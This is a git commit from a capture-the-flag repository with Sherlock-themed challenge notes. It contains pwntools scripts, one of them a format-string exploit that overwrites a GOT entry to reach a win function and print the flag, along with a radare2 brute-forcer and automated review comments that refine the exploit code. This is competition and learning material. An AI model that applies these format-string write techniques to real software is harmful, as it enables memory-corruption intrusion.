Commit ef0a1b01 authored by Chris James's avatar Chris James

updated stuff

parent bfcf4d86
England would fall if Mrs. Hudson leaves Baker Street. Mrs. Hudson is the first one who is totally exploited by Sherlock, or Does She?
nc 146.185.168.172 54514
nc 178.62.249.106 54514
#!/usr/bin/env python2
from pwn import *
from IPython import embed
ips = ["146.185.168.172", "178.62.249.106"]
port = 54514
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
if sev == 1:
msg += "[WARN] - "
if sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg)
def lengthTest(ip):
log("Length test on {}".format(ip))
maxLength = 2001
lengthStep = 100
log("maxLen: {}".format(maxLength))
log("lengthStep: {}".format(lengthStep))
for i in range(1, maxLength, lengthStep):
log("Connecting to: {}".format(ip), sev=1)
r = remote(ips[0], port)
log("number of bytes: {}".format(i))
log(r.readline())
log(r.send("\n"* i))
print(bytes(r.readline()))
r.close()
def main():
log("script starting")
lengthTest(ips[0])
embed()
if __name__ == "__main__":
main()
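Review bot: `lengthTest(ip)` ignores its `ip` argument — the line `r = remote(ips[0], port)` always connects to the first host, so calling it with `ips[1]` would still probe the wrong server; change it to `r = remote(ip, port)`. The `log` helper chains `if`/`if`/`if`/`else`, so the `else` branch also fires for `sev` 0 and 1 and a tab is inserted after the `[INFO]`/`[WARN]` prefix — use `elif sev == 1:` / `elif sev == 2:` as the `greg_lestrade` script in this same commit already does. The socket opened on each iteration is only closed on the happy path; a read that raises leaves it open, so wrap the body in `try`/`finally` around `r.close()`. `r.readline()` carries no timeout, so a server that never sends a line stalls the whole sweep.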
Lestrade is often frustrated by Sherlock's cryptic deductions and habit of withholding evidence, but believes that he is a great man. He has been easily exploited when Sherlock remembered his name properly.
nc 146.185.132.36 12431
return to 0x00400876 to win!
break on 0x00400afe for command input
break on 0x00400b34
read == 0x0040097d
printfGOT == 0x602040
printf == 0x00400a0c
buffer is 0x80 big, reads 0x3ff characters
#!/usr/bin/env python2
from pwn import *
from IPython import embed
DEBUG = True
target = 0x400876
if DEBUG:
p = process("./greg_lestrade")
else:
p = remote("146.185.132.36", 12431)
def wait():
sleep(0.2)
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
elif sev == 1:
msg += "[WARN] - "
elif sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg.rstrip())
def main():
secret1 = "7h15_15_v3ry_53cr37_1_7h1nk"
log("Starting muh exploit...")
if DEBUG:
log("In debug mode, [enter] to continue...")
raw_input()
for i in range(3):
log(p.readline())
log("Sending secret #1...: {}".format(secret1))
p.sendline(secret1)
for i in range(2):
log(p.readline())
p.sendline("1")
p.readline()
log("What we have here is a failure to printf()...", sev=1)
#value i need to write to GOT (0x602040):
#writevalue = '400876'
#write in 2 halves:
#first clear out the lower half of GOT entry:
writeStr0 = "%72$n"
#now we write 2nd half of desired word, 0x0040:
writeStr1 = "%65123lx.%72$hn"
writeAddr1 = p64(0x602042)
#now we write first half of desired word, 0x0876
writeStr2 = "%2101lx.%73$hn"
writeAddr2 = p64(0x602040)
#now we construct our payload of the ages:
payload = 'a' * (0x1fe - len(writeStr0 + writeStr1 + writeStr2)) + writeStr0 + writeStr1 + writeStr2 + '\x0a\x00' + writeAddr1 + writeAddr2
log("Sending Payload!", sev=2)
log("LOOK AT THIS PAYLOAD: {}".format(payload), sev=2)
p.sendline(payload)
log("Triggering exploit...", sev=2)
p.sendline("1")
p.readline()
for i in range(3):
p.readline()
log("Retrieving flag...", sev=2)
print(p.readline())
if DEBUG:
embed()
p.close()
if __name__ == "__main__":
main()
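Review bot: The padding arithmetic on the `payload =` line is correct but entirely implicit: the `'a'` count (0x1fe minus the three specifier lengths, i.e. 476) must put exactly 476 bytes before the first `%n`, so that `%65123lx.` brings the count to 0x10040 and `%2101lx.` to 0x10876, and the `\x0a\x00` tail must make the string exactly 0x200 bytes so the two `p64` addresses land at positional args 72 and 73. Any edit to a specifier shifts both the string length and the printed count and silently breaks the GOT write; add `assert len(payload) == 0x200 + 16, "payload layout drifted: addresses no longer at %72$/%73$"` before `p.sendline(payload)`, and consider deriving the two widths from `target` instead of hard-coding 65123 and 2101 while `target = 0x400876` sits unused. The `p.readline()` calls have no timeout, so a hung remote blocks the script indefinitely, and `wait()` is defined but never called.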
#!/usr/bin/env python2
from pwn import *
from IPython import embed
DEBUG = False
target = 0x400876
if DEBUG:
p = process("./greg_lestrade")
else:
p = remote("146.185.132.36", 12431)
def wait():
sleep(0.2)
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
if sev == 1:
msg += "[WARN] - "
if sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg.rstrip())
def main():
log("Starting muh exploit...")
if DEBUG:
raw_input()
for i in range(3):
log(p.readline())
log("Sending secret #1...")
p.sendline("7h15_15_v3ry_53cr37_1_7h1nk")
for i in range(2):
log(p.readline())
p.sendline("1")
p.readline()
#value i need to write to GOT (0x602040):
#writevalue = '400876'
#write in 2 halves
writeStr0 = "%72$n"
writeStr1 = "%65123lx.%72$hn"
writeAddr1 = p64(0x602042)
writeStr2 = "%2101lx.%73$hn"
writeAddr2 = p64(0x602040)
payload = 'a' * (0x1fe - len(writeStr0 + writeStr1 + writeStr2)) + writeStr0 + writeStr1 + writeStr2 + '\x0a\x00' + writeAddr1 + writeAddr2
log("Sending Payload...", sev=2)
p.sendline(payload)
#leak = ".%137$lx"
#p.send('a' * (0x1fe - len(leak)) + leak + '\n')
#output = p.readline()
#print(output)
#canary = output.split(".")[-1]
#log("Canary: {}".format(canary), sev=2)
p.sendline("1")
p.readline()
for i in range(3):
p.readline()
log("Retrieving flag...", sev=2)
print(p.readline())
if DEBUG:
embed()
p.close()
if __name__ == "__main__":
main()
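Review bot: The `log` helper in this copy uses `if sev == 0` / `if sev == 1` / `if sev == 2` / `else`, so for severity 0 and 1 the `else` branch also runs and a tab is inserted between the prefix and the message; the sibling `greg_lestrade` script in this same commit uses `elif`, and this one should match (`elif sev == 1:` / `elif sev == 2:`). This file is otherwise a near-verbatim duplicate of that script with `DEBUG = False`, so a fix like this lands in one copy and not the other — a single script that takes the mode from `sys.argv` or an environment variable would remove the drift. The commented-out canary-leak block between `p.sendline(payload)` and `p.sendline("1")` is dead code and should be deleted or moved to the notes file. As in the other copy, `p.readline()` has no timeout and can hang on an unresponsive remote.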
0x400b77
victory string = 69fc8b9b1cdfe47e6b51a6804fc1dbddba1ea1d9
'deadbeefcafebabe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'0eadbeefcafebabe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'1eadbeefcafebabe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'1eadbeefcafe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'fffdbeefcfff' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'dead0123cafebabe' == 6d6dbdd33bcef6f6fb4a0d91b9b27f164380f1fd
'0000beefcafebabe' == c263575659ca64329e99bbf8c37db27ef61a68e4
#!/usr/bin/env python3
from binascii import hexlify,unhexlify
import r2pipe
goal = '69fc8b9b1cdfe47e6b51a6804fc1dbddba1ea1d9'
def runProg(thing):
arg = '69fc'
arg += hex(thing)[2:].zfill(4)
arg += '69fd'
print("Trying with: {}".format(arg))
r2 = r2pipe.open("abc", ['-d'])
r2.cmd("ood {}".format(arg))
r2.cmd("db 0x400b77")
r2.cmd("dc")
output = r2.cmd("pr 40 @ rax")
print(output)
return output
def main():
#we try all 3-byte inputs until goal is reached
for thing in range(0xffff):
output = runProg(thing)
if output == goal:
break
print("we have a match!: {}".format(hexlify(thing)))
if __name__ == "__main__":
main()
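Review bot: `print("we have a match!: {}".format(hexlify(thing)))` after the loop raises `TypeError` under Python 3, because `binascii.hexlify` needs a bytes-like object and `thing` is an `int`; it also runs whether or not a match was found, since nothing distinguishes `break` from loop exhaustion. Every `runProg` call opens a fresh radare2 via `r2pipe.open(...)` and never calls `quit()`, so a full sweep leaves up to 65535 debugger processes alive. The comment says "all 3-byte inputs" but `zfill(4)` produces two bytes, and `range(0xffff)` stops one short of `0xffff`. `r2.cmd` output commonly ends with a newline (confirm against your r2pipe version), in which case `output == goal` can never be true, so compare the stripped value.
```python
def runProg(thing):
    # … unchanged: build arg from '69fc' + 4 hex digits + '69fd' …
    r2 = r2pipe.open("abc", ['-d'])
    try:
        r2.cmd("ood {}".format(arg))
        r2.cmd("db 0x400b77")
        r2.cmd("dc")
        output = r2.cmd("pr 40 @ rax")
    finally:
        r2.quit()  # otherwise one radare2 process per candidate stays alive
    print(output)
    return output.strip()

def main():
    # try every 2-byte value 0x0000..0xffff until the goal digest appears
    for thing in range(0x10000):
        if runProg(thing) == goal:
            print("we have a match!: {:04x}".format(thing))
            break
    else:
        print("no match found")
```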